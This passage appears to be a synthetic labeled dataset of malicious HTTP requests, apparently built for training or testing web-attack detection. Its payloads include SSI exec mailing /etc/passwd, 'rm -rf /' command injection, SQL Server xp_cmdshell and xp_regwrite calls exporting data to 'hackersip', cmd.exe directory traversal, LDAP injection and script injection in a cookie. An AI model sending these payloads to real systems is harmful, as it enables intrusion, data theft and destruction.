ETag: W/"45NPbgutQsMuP7R"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Thu, 26 Feb 09 05:01:22 CET
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: *
If-Range: "AwNEyj99C2j5zSWS"
Max-Forwards: 3875
MIME-Version: 9.8
Pragma: s=yaEdmem
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: eH4teM jsxnoc=5ihxiqi
Range: -7,891-,-651
Referer: http://ktelub.net/Ijli/t6otapda.css
TE: gzip
Trailer: Trailer
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 2.2; aa-iu; rv:6.8.8) Gecko/95107793
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: HTTP/8.2 www.feet9sc.js, 1.1 www.ieoBerho.html
Transfer-Encoding: niet; toiedssh=eyswno
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 279 5.34.104.253 "ycytrdqnsuf" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44825
Start - Id: 40188
class: SSI
GET /trQdeLmdQCym5k/oJPMP396/eogtYd/wmCcS_D1vKVK0QX3/1Bv2tz9yYeVn7s0XVOPc/qZguLqnqu5qJcId_P.nsf?idek.Fbuq=drblsbpHshaving%28o4updateselectt%3A&ssstaatle=aaar&urctr=tmreCNLta5eei&isatxiNS7bpLthn=80763676&T0agK6passthrut=r+ftpUipasswdmsLaJ6&6r=8ihonoFlrO&axcTro=rrrvMfyoae&noirterOiesuis=rs5..z&sdhonp=e-uEq&tpqea8=%3C%21--++++%23exec++cmd%3D%22%2Fbin%2Fmail++tiSa.com++%3C++++%2Fetc%2Fpasswd%22--%3E&wvg0n=493 HTTP/1.0
Host: www.sjahmsrNai.net:80
Connection: eklo1N
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip, gzip;q=0.8
Accept-Language: ldh-ssao;q=0.6
Cache-Control: max-stale=0068
Client-ip: 58.239.184.20
Cookie: rndzbdoojllvBni=knmds;n8Eiortres=ij5msaxgrl t[e
Cookie2: $Version="6"
Date: Mon, 04 Jun 07 16:29:01 UTC
ETag: ".ZKJTl9HO98Bx3@W6"
Expect: 100-continue
From: beevy@rdaeiuersl.de
If-Modified-Since: Sun, 14 Mar 04 05:15:25 GMT
If-Unmodified-Since: Mon, 06 Oct 08 05:15:08 CET
If-Match: "Q4SrEEcQUV82ZXktS-TI"
If-None-Match: "EkFNCP3HiUmc2q-6"
If-Range: Sat, 10 Oct 09 21:12:58 CET
Max-Forwards: 7398
Pragma: 7lUen='hqD'
Proxy-Authorization: Digest nonce
Authorization: 2izi oEesqes0=Ina6nc
Range: 95170-36663
Referer: /uqn8r/amdrd.jpg
TE: gzip;q=0.1
Trailer: Pragma
User-Agent: Mozilla/5.7 (X11; U; Open BSD i586 1.8; rs-sm; rv:4.9.3) Gecko/02791192
UA-CPU: 68000
UA-Disp: 134,343,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 9646x716
Via: FTP/2.0 218.220.112.176, heHn/3.4 www.itrn.html
Transfer-Encoding: qaho; hite=aeelL
Upgrade: aiaEi/3.2, nenl/7.3
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40188
Start - Id: 42124
class: SqlInjection
GET /l7rcYhf010hK0WSfeYd/hoEqB-Az/GYks4HgC_ENpjEP/eoeLufvaacwit/7yBOzPE/mailN.htm?NOL2m=OR+++++%27msesknfdpl%27+++++%3D+++++%27+++++%27&4bdfh=cae HTTP/1.1
Host: 8.224.222.15:3
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: s6-y, hhso3hBa-6E4tie7;q=0.2, jyvl-l1uHe8et;q=0.1, a-2e, ophoA-ladirk0;q=0.0
Cache-Control: only-if-cached
Client-ip: 176.134.195.247
Cookie: tnrt4yDh=2322283835;YmQ77netcathtpass=lNtetiadmql;mA4frqinelLtb=87;7tphod7yuc=iZTH9j7V;efaesfd=nm&tncopen4emwtl]aechoe?i
Cookie2: $Version="52"
Date: Fri, 02 Oct 09 23:32:24 GMT
ETag: "36ABV77V@jd_sdUj"
Expect: aeUss=7wjdte;uElxnLe
From: stgPOeE@DeaasWp.org
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Wed, 28 Jul 04 08:29:55 CET
If-Match: *
If-None-Match: *
If-Range: "nV5hux00tnvHcloCn5l"
Max-Forwards: 2
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest qop=auth-int
Range: 80-3804,023297-91,09-
Referer: /tu1To.htm
TE: trailers
Trailer: Proxy-Authorization
User-Agent: aibPpI-o http://www.y5iwem.uk
UA-CPU: MIPS
UA-Disp: 3899,512,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1285x9347
Via: 1.5 www.hao5se.jpg, oape/2.8 www.elob7ps.jpeg, FTP/8.6 www.hcut.png
Transfer-Encoding: dJbwaz; rtPnceer=rhtsuh
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42124
Start - Id: 43248
class: OsCommanding
GET /rgns/arvda7MrBcsateegEaf/gu/tl3ccB/n@PpUOPT_wy5odb4j/o-uVO3CyAWgWA_sQVMU/ddottdtehecoatstp.gif?ieeiawxbetoh=sak&ounion72r=703&ntledalrj=rias6hdfeo&nerrnthaoo=172865&Aeaf02cGaAscriptN=httpt%25x0d&quR11mftpKbody=81111850&mwget4R8rPA8=igcmdtle&ojsWLp=oehaerriN8&uuoeehwjoea=u&io=%60+++rm++-rf+++++%2F%60&1yboErb=903348&ynabo5=4473799&aptpeh9=r%29%5Bld8Ietosd%3F+ertq%5D&qxf6CSnode@0kopenj=thz8orr HTTP/1.1
Host: 52.112.78.115
Connection: keep-alive
Accept: application/x-tar;q=0.0
Accept-Charset: x-mac-japanese, windows-1258, iso-8859-9, euc-jp;q=0.9, macintosh;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: o=att2aae
Client-ip: 92.41.242.45
Cookie: aLtcgj=l11Cm
Cookie2: $Version="89"
Date: Thu, 24 Mar 05 14:52:11 GMT
ETag: W/"4OevjYPAXE2q_Wfy7"
Expect: h6244tu
From: w5itei@2re1ofAi.st
If-Modified-Since: Mon, 07 Mar 05 11:27:56 CET
If-Unmodified-Since: Sun, 13 May 07 19:29:37 UTC
If-Match: "jJJQ8_zWsQ9.n85fq.e"
If-None-Match: "KNpOLxGzqwDX@7YWDblS"
If-Range: Thu, 27 Mar 08 03:45:14 CET
Max-Forwards: 7196
MIME-Version: 9.7
Pragma: raoaa='aOAog'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: Basic SnRiYTdjMHI6MmRnYWN0
Range: 6235-,3-
Referer: /5i4tsoo/sCea.ace
TE: trailers,chunked;q=0.6,trailers
Trailer: If-None-Match
User-Agent: Tston0teonao8imc0tma
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: HTTP/2.9 www.ygtoa.html:710, 4.9 14.99.92.82, 8.4 21.157.217.146
Transfer-Encoding: identity
Upgrade: nedg/4.6, yodj/9.6
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43248
Start - Id: 38387
class: LdapInjection
GET /hBW@Fk_TvlEVHoyX6f/mu-24wcraShLkN.uW_v/egzcvkSmHo_rCl3nMY/lo/8-0.w0HnaV/t84Of/f9HpasswdZX9EQC8tan.asp?yw4geiwhofqaqra=0524&p1eaBei=e63J2&nsbsniLfkavno=A&37vtmpLK_=gHRNEf&niDeeitzsEeMane=44&bfi4ed=copyf&eatiOn0esid=iy&ya=hbeormfexPehial&1vngnie=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&kHoAua9=sk0sXMTu&ogaiLe3eErle=5j&joeHqblf=087752&estyle.l1=nconnect HTTP/1.1
Host: 16.44.9.74:849
Connection: close
Accept: application/zip;q=0.0, video/quicktime;q=0.3, audio/*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: compress, compress;q=0.2, gzip, identity;q=0.1, identity;q=0.1
Accept-Language: *
Cache-Control: 5eeiu=sndelm
Client-ip: 64.84.236.66
Cookie: passwd9KPT=iiT;TnddoxhcciiqDs==Th+ih;nh9o=9283;eyadasjjethanho= %ufo7rrFrmeerrxp_t;litedptnozgPesi=nAxy43.R
Cookie2: $Version="662"
Date: Fri, 04 Apr 08 08:12:06 CET
ETag: W/"yNFl3unHM9j-nY_lvkD"
Expect: uFhie
From: e3ig@cUsnasr.com
If-Modified-Since: Thu, 29 Sep 05 01:44:50 GMT
If-Unmodified-Since: Tue, 21 Nov 06 09:51:10 UTC
If-Match: "R4xPtV2oP8npzAVEVCq2"
If-None-Match: *
If-Range: Thu, 14 Jan 10 16:11:26 UTC
Max-Forwards: 6
MIME-Version: 2.3
Pragma: oe='tTuaq'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic MHk3OHhhc3Q6cmk3d29vcmE=
Range: 5-3896,18685-499682,-36
Referer: /dreels/eyet/shmgeln.asp
TE: gzip;q=0.1
Trailer: Accept-Encoding
User-Agent: eOe0 (ivBjw8jMxf)
UA-CPU: x86
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: FTP/1.6 160.150.147.193, 0.3 40.189.67.2
Transfer-Encoding: deflate
Upgrade: ottf/8.1, nEtN/4.3, m1n4n/1.7, fN2/3.2, attfJ/3.6
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 120.14.244.116
X-Serial-Number: 85165873223938
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38387
Start - Id: 40046
class: SSI
GET /w3execT6jr/dg3oetraelAi/cmdutiIE27vwJGu/anm75lWCowhmehoii/ik/alo7Je9syEOYj3dateao/tE/trt@php/sdSQtdur.swf?fbt=jnienkporlretu&oets9mn=ee1wtdtqsfkgo&eu2as5heidjmSpn=%3C%21+++%23%3C%21--++++%23exec+++cmd%3D%22id%22--%3E&rptemoEyidY=Le%5D HTTP/1.0
Host: www.qhrellT.fr:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, utf-8;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=621
Client-ip: 216.42.174.149
Cookie: .20connect=tnTM5hQ;azpbeo=345;eqa=mstK7
Cookie2: $Version="5"
Date: Sun, 27 Jan 08 23:36:09 UTC
ETag: "xJcfFu.TQv6CMJdq7b"
Expect: 100-continue
From: crdluua@zohe.com
If-Modified-Since: Wed, 16 Jun 04 05:04:18 GMT
If-Unmodified-Since: Mon, 22 Aug 05 06:58:36 UTC
If-Match: "LWo9BJHNxuKpxacg"
If-None-Match: "KnWoln-23GKyk2Zw"
If-Range: Mon, 19 Feb 07 15:09:41 CET
Max-Forwards: 787
MIME-Version: 7.2
Pragma: a1Iinlh='sytf6P'
Proxy-Authorization: Basic b3Rvd046bE5vZGh4bA==
Authorization: NTLM ZW8xRXdoclVpaWFldWxzbnRoZW5UZW9TdzVzb3J2b2Vpbm9zZGk2ZUU=
Range: 92956-
Referer: /tceEo/aaStz/oiga4/wnsvh.css
TE: trailers
Trailer: User-Agent
User-Agent: yRubn/1.5.7.5
UA-CPU: MIPS
UA-Disp: 490,576,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: munr/7.3 161.214.68.211
Transfer-Encoding: compress
Upgrade: Reeanu/6.7, rten/3.6, tdg/3.6
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 02001
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40046
Start - Id: 44856
class: PathTransversal
GET /aLO3V/ih5autoexec-kEY/Uk6phpiOd-rWlHm_/Elhlinapitqsdnwtmr/et.mUt0Xs-iG/@Q_ic5P.html?emneoir=eueussvqWrI1slcsyo&snEmtfomTii=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&5-7k-Vh=06652&ehStsrta0eeo=0&aql8TrnahEgRv=catanechotehzevallhtaccese+&ZEBjLxXNkP=ns3autoexeclrrpe+gsnfT&s2ohymu=sn&otaPa0Mfec=Italaejtun&csm9os=sl&saideindsoF7=td7&jnzorFes=7132&l4srtbq3oyt=kere&1_QWqw=4239711&9in=hTnOLikz HTTP/1.0
Host: 197.44.115.193
Connection: keep-alive
Accept: video/*;q=0.0, text/plain
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: fror-o, bjda6hYn-5kbtnrt
Cache-Control: only-if-cached
Client-ip: 31.199.198.5
Cookie: 5jTEmt@-KyKinput=8ehe97
Cookie2: $Version="27"
Date: Mon, 28 Dec 09 07:33:08 CET
ETag: W/"2Hr_1mB_sXpKsq.@5EV"
Expect: eloob=qdejeads
From: netotmi@oanhTettwr.cz
If-Modified-Since: Tue, 04 Apr 06 05:37:57 UTC
If-Unmodified-Since: Mon, 11 Feb 08 18:20:34 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 28 Nov 08 03:28:06 GMT
Max-Forwards: 66
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic dWRlNmk6eG1ocHA4Zjk=
Authorization: NTLM bEthRWgxdHRFUnlhZ3owYm9kbFI0cmNwYWVtY2dvdXRiYmQ=
Range: 3752-,303-8,-33345
Referer: /ueci/Fae5e29/gnHiiten/2ehcyoip.tiff
TE: trailers,trailers,gzip;q=0.8
Trailer: Date
User-Agent: Mozilla/9.0 (Machintosh; U; PPC Mac OS X 2.7; nb-he; rv:1.9.2) Gecko/60655895
UA-CPU: StrongARM
UA-Disp: 076,426,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 458x842
Via: FTP/5.9 www.Oouttx.html, f5er2/7.2 www.opwioeiP.jpg, 1.9 72.32.105.251
Transfer-Encoding: compress
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 565 www.9hmbio.js "egRIp9dtnpPtahcsat" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 24997
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44856
Start - Id: 36529
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 42.216.134.104
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: macintosh;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 164.144.166.119
Cookie: fcnDFegoreds=xterml
Cookie2: $Version="647"
Date: Thu, 22 Jun 06 15:35:43 CET
ETag: "9whZtA3o_sAhDS82bNb"
Expect: 9nww
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Sat, 02 May 09 13:49:05 UTC
If-Unmodified-Since: Wed, 24 Dec 08 16:44:26 CET
If-Match: "v-9C0a9p1KtEsLo"
If-None-Match: "cN7vKw@Q2CXVi1BJhpXV"
If-Range: Sat, 20 Nov 04 20:30:16 CET
Max-Forwards: 83
MIME-Version: 0.9
Pragma: brasxhe='axdna'
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: ebie lqim0=ntd5
Range: 17-
Referer: /ugttrSo/rAYtm/gtrEwgok/anmehus.zip
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: inoBpf2dcucan
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 547x5195
Via: 6.8 www.t6wa5h6E.js, 4.7 244.206.70.132
Transfer-Encoding: gzip
Upgrade: rind/5.0
Warning: 048 www.e6frT.shtml:3476 "eA38Htn4cp4sefaeTVr" 
X-Forwarded-For: 150.134.65.172
X-Serial-Number: 572371428893
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36529
Start - Id: 41122
class: SqlInjection
GET /t_FKvb/tqI8efr1hCSlv/501WfT-h6z3JGWXT-F/lmEa/AE/8XM5rmDck/rkvG0c/nciknxeIvvhfN/n2tmAkExQedG/wxRV7/39hnJuRKLm.tiff?enoiy5Scofuws=w%400KIV&rtI6lSnnhiae=omoR&oyosFjmpt=exec+++xp_regwrite+++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27atlrm%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&wRowrn3kensdeea=from%3Azeq&vndssr=Al4wialcur&yvbscriptTpasswd6M=ymBrle%2Bocoe6ta&nhsbcrveorzn=3833&cArr2wp3oi=854&LTi=31247194&i1lThnit=ncheititlizaxHEwhe&te=064162&e5nyttedsriis8j=a%25lI&tOhuRpfo=76&R7Fterttv76a2=ifw&snord=est HTTP/1.0
Host: 4.19.146.156
Connection: keep-alive
Accept: image/gif;q=0.3, text/xml;q=0.1, image/jpeg;q=0.6
Accept-Charset: euc-cn;q=0.2, shift_jis;q=0.9, x-mac-japanese;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: drorIos-mmZ
Cache-Control: max-stale
Client-ip: 104.85.29.24
Cookie: hz=hzuoezu0;allEoP=elsah70nO3oownean;9OM5_fG=tFtwC_;Qxre4riajli=oB5.;aw8a=800412;oiokn1ebsnaAi0e=eEG
Date: Mon, 23 Jan 06 05:55:03 UTC
If-Modified-Since: Wed, 09 Jul 08 11:32:06 CET
If-Unmodified-Since: Thu, 10 Jun 04 20:18:33 CET
If-Match: *
If-None-Match: *
If-Range: "t2Sce7m_RrSPnuAIZsYS"
Max-Forwards: 600
Pragma: oz2s='ltryu'
Authorization: NTLM U2V1YmptdG1wZWVlaWVjU2FvcjYzY3R5YWVhMWYwdGk4NmN0eQ==
Referer: /tezL.mdb
User-Agent: Mozilla/0.4 (X11; U; Open BSD i586 2.9; ua-Pt; rv:8.7.8) Gecko/23724968
UA-CPU: 68000
UA-Disp: 106,924,16
Transfer-Encoding: identity
Warning: 894 www.t2teem.tiff:4 "hItafp" 
X-Forwarded-For: 155.33.177.149
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41122
Start - Id: 46218
class: PathTransversal
GET /zhes1tou20tareatmlnl/fU/bisQ/snnrEidieqinsso/nTBQQxui/FcedunhnnAnfnhdte7/ykTgC4-_g.png?-iafWK1s=52374192&klEgnhqAge=08756238&kssnotewl14sv=eneS%24xo5rsTdd&ermtuinslrozHoa=5427505&oafsaihsa8ttngr=t%3D+9dqgezunull&aads1ynekHony=p&uoiL7=u%40hZX&mnlsilasHntqve=k%29&Neya2aas6Tjy=yac&er=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2FoahWi.conf HTTP/1.1
Host: 19.210.217.183
Connection: close
Accept: */*;q=0.8
Accept-Charset: utf-7;q=0.0, cp-932, iso-8859-7;q=0.2
Accept-Encoding: 
Accept-Language: tfoWl-ihtaywl4
Cache-Control: max-stale
Client-ip: 244.185.69.193
Cookie: xbxW@htaccesrcpN=713213;UrIm=cpe1nSoe8 ;vnEZk=594647459
Cookie2: $Version="6"
Date: Wed, 28 May 08 03:03:04 UTC
ETag: "nI.a6FWh6b-0gkQ-ph."
Expect: tiesfh=tc5ceo;tebom
From: xeibsrh@cIoaz0o30a.fr
If-Modified-Since: Fri, 06 Mar 09 22:45:35 CET
If-Unmodified-Since: Wed, 05 Mar 08 22:16:58 GMT
If-Match: "ji2IcZ_4V6jG5Rw5QiI5"
If-None-Match: *
If-Range: Mon, 28 Apr 08 18:11:41 GMT
Max-Forwards: 1
MIME-Version: 5.5
Pragma: bt='lptreitl'
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Basic aDBlczptaWU5aQ==
Range: 63-8582,2-821656
Referer: http://tlot1ed8.cz/tugs/pahRtC/oxehwsp/eeuiwa/ma2rp0re.jsp
TE: gzip
Trailer: Accept-Encoding
User-Agent: ydxW/0.2.3.8
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6581x3968
Via: FTP/0.3 115.106.41.188, 3.6 149.83.176.182:3376
Transfer-Encoding: eeesu; aAMy=6hnpsn5
Upgrade: esjpot/5.8, eni/8.5, tytox8/4.9
Warning: 048 www.olNtt.tiff "8Oh4bg22euilahgn" 
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46218
Start - Id: 46738
class: XSS
GET /dPdBAGdw7/3ot.shtml?prcinolSods=ubt1ntlv&rets=9120&warsdln4b=6&aoyfshs=362645112&rd=sS_2etPWIv&tHXRdroprVk4v=loga%3Ayb85eeTr%24uEn3&yzseEsehtame5ui=2866&keds=lfra%5DopenQaru&Miftedkkbdd=+i%29et HTTP/1.0
Host: www.yecrl0g.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=2
Cookie: gk4rs8cuT=<script >alert ( "    upatcRoe.0arp5")</script>;amtstlaipteT=eigperl%ei;zf=elUQurzgAFVd;tymltaipaaEiao=hmyirti;idbetsn3nrEeh=923;f47meKkccaeurci=921969495
Cookie2: $Version="780"
Date: Fri, 25 May 07 10:59:09 CET
ETag: W/"TW83Vyq71WoHPX8cEG3S"
From: vpiisea@ttsPnero.gov
If-Modified-Since: Thu, 21 Jun 07 05:00:05 UTC
If-Unmodified-Since: Thu, 08 Feb 07 18:13:37 GMT
If-Match: *
If-None-Match: "nsKihPCSGLA@w41DI"
If-Range: Wed, 28 Apr 04 19:09:37 GMT
Max-Forwards: 2895
Pragma: ssdrg='rM'
Range: 442056-228255
Referer: /rokee/agstsfpd/t7sWzTf.avi
TE: trailers,chunked
Trailer: From
User-Agent: Mozilla/2.3 (X11; U; Linux i586 8.7; sA-te; rv:6.1.0) Gecko/86938893
Via: rsdc7c/2.8 106.45.178.76, 6.4 235.56.37.237, FTP/3.5 www.u8inced.jpeg
Transfer-Encoding: rxszi0; hghiusik=carma
Upgrade: acef/9.1
Warning: 811 www.etimuquh.jpg "yaitsotn" "Wed, 27 Jun 07 01:22:44 GMT"
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46738
Start - Id: 41073
class: SqlInjection
GET /sc8U-/ezf6mGkId1Yu/eoraucjtsoe6Atxprt/naen44tlTuetc2ir/esmfRgC@d5ZjEnIA/geSyqaMooocqtomfe/nwaAmzgraXhemnta0/0tKUYdA2L2pj96/watuoxzsEiht/6ys1spt9e/ysTBmj9KfvGkZF/lln.jsp?aqquicdttoifr=exec+++++xp_cmdshell+++%27bcp++%22select++*++from+++++fh%22++queryout++pwdump.exe+++++-c++-Craw+-Shackersip+++++-Usa+++++-Ph8ck3r%27&a24UIN=%24j%5B%29or%7EW%3F&lnss=anrfnridIatadb6&silsi3SslTttr=954832&mtp5etio=elbn89&vscript3minputT=6595865094 HTTP/1.0
Host: www.4drawTsec.gov
Connection: close
Accept: image/jpeg, application/rtf;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: ur=msd
Client-ip: 26.111.242.56
Cookie: ddtr3naop=4964391060;m2=28;t3gt47esy=wanOdtrsRdauy
Cookie2: $Version="187"
Date: Tue, 23 Aug 05 09:20:32 CET
ETag: "dAZmn_EU_5mYota"
Expect: 100-continue
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Mon, 04 Apr 05 19:41:15 UTC
If-Unmodified-Since: Tue, 15 Feb 05 01:39:45 CET
If-Match: "pwn5gxFi5EmwbP7"
If-None-Match: *
If-Range: "jH.HSSGdokJL@Wxsx"
Max-Forwards: 32
MIME-Version: 1.5
Pragma: aAhy='lthsed'
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Digest nc=9fcD4a3F
Range: 253-,679517-254
Referer: http://aiihc.be/ozlwxs2/05ufaee/iCeSpi.gz
TE: trailers
Trailer: Max-Forwards
User-Agent: djaij6dbs4afhtu
UA-CPU: 68000
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: FTP/5.9 www.etcu.htm
Transfer-Encoding: identity
Upgrade: t1er/5.7
Warning: 764 76.214.33.91 "Rbeodtq" "Fri, 19 Mar 04 18:10:47 GMT"
X-Forwarded-For: 32.32.219.84
X-Serial-Number: 54708069609443708
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41073
Start - Id: 41393
class: SqlInjection
PUT /icteT7san/wB2HHOFp7VS@aI-I/rEtdnndMscra/psapsseelhhOZm28a/Ac_W@.gif? HTTP/1.1
Content-Length: 136
Content-Language: gztpllEs,oyo,lsjoeari
Content-Encoding: gzip
Content-Location: http://www.5pfwq.st/ahnknmp.php3
Content-MD5: dGVkNGhhZW5lMWhkZHZlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 Jun 07 09:07:08 GMT
Last-Modified: Thu, 03 Feb 05 20:45:59 GMT
Host: www.eynew2nsow.be:35113
Connection: close
Accept: */*
Accept-Charset: windows-1255;q=0.0, euc-tw;q=0.9, iso-2022-kr, x-mac-chinesesimp, x-mac-arabic;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: h6sDl-or2q
Cache-Control: only-if-cached
Client-ip: 253.80.116.112
Cookie: ihnte1afytgnrlH=rygo@yvC55J;qNsu4ramn=76182;DlovanzceGmneia=8
Cookie2: $Version="98"
Date: Tue, 04 Sep 07 21:22:55 GMT
ETag: "lIiRlIPKte_9Hpgpj"
Expect: 5ERmu=ncdsee
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Sun, 12 Apr 09 17:51:47 GMT
If-Unmodified-Since: Mon, 31 Mar 08 15:25:14 UTC
If-Match: "UEWfH-xPbqZ8M3Yo-VU5"
If-None-Match: "DE@@fpJUAhddfz._DH"
If-Range: Mon, 19 Jan 04 15:37:08 UTC
Max-Forwards: 5062
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: NTLM dm9sZk1jT250TGh3c3pveWlSaWRuYmV0YnJzRnJyOXJ0bGFlYXQ0
Range: 711-
Referer: /onuj4keE.asp
TE: chunked;q=0.2
Trailer: Upgrade
User-Agent: 6nniti7y (fB75uBbNv)
UA-CPU: 68000
UA-Disp: 727,089,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1178x5140
Via: FTP/2.1 www.9gMd.gif:81, 0.4 8.74.59.228, FTP/8.4 www.Rijrdrou.jpg
Transfer-Encoding: identity
Upgrade: vtba/8.2, hnytoe/8.1, aWaG0t/9.1, Ins/7.8, icoct/4.7
Warning: 978 www.aeers.png "pstsl2qua0E" "Sat, 06 Mar 10 21:32:52 GMT"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 3067055271
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

erthhle4eAtis=597985227&ofm8piE9cr=5qj&sTafnr0Suc=98181453&rweidmeaxfste=been&ae4e=OR  'dP5tacm'    BETWEEN 'R'    AND   'T'

End - Id: 41393
Start - Id: 42216
class: SqlInjection
GET /re8opuramdbel/d1A3.shtml?netegnN4dten=oteOwrzoelrsiT&4sWW=561&dlM4qsenotL=on5rinaaseieemoit&dboa1=85&etadwrdEh=teeeeGexr0eniprt&czcgieLixXTrd8e=eehos&SAw=bP25Y3&f7ZobjectrmbetweencSW=00133&QDabemodei=lFlw&ohric=gGsteeedbgo&e2ycrtC5=%27++%2B+++%28+SELECT++TOP+1+++Lnnoro0e+FROM++foRealTf%29+++%2B+%27 HTTP/1.1
Host: 49.240.136.185
Connection: close
Accept: */*
Accept-Charset: windows-874;q=0.8, euc-tw, x-mac-cyrillic, isiri-3342
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.5
Cache-Control: sik='iw'
Client-ip: 184.140.210.188
Cookie: WoCS=e) lwu-0iprw
Cookie2: $Version="069"
Date: Tue, 07 Aug 07 14:30:36 CET
ETag: "qu.jZl22SCIG3R.JF"
Expect: cttahr1o
From: 6bttom@2kOpyg.org
If-Modified-Since: Sat, 05 Sep 09 08:14:04 GMT
If-Unmodified-Since: Wed, 24 Aug 05 23:43:17 UTC
